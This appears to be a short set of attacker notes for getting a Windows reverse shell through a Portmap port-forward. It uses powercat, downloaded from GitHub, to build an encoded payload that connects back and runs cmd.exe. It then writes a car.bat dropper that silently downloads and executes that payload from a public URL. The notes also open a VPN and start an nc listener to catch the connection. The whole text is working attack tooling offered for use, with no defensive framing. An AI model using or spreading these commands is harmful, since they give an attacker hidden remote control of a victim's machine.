LHOST=<Ip of Portmap>
LPORT=<Port Of Portmap>
rshell=shell-443.txt
pwsh -c "iex (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c $LHOST -p $LPORT -e cmd.exe -ge" > $rshell



echo START /B powershell -c "\$code=(New-Object System.Net.Webclient).DownloadString('Publically Accessable Url of the shell-443.txt');iex 'powershell -E \$code'" >  car.bat

openvpn <your vpn file from portmap>

rlwrap nc -nlvp <Port That you given on Portmap as system open port>

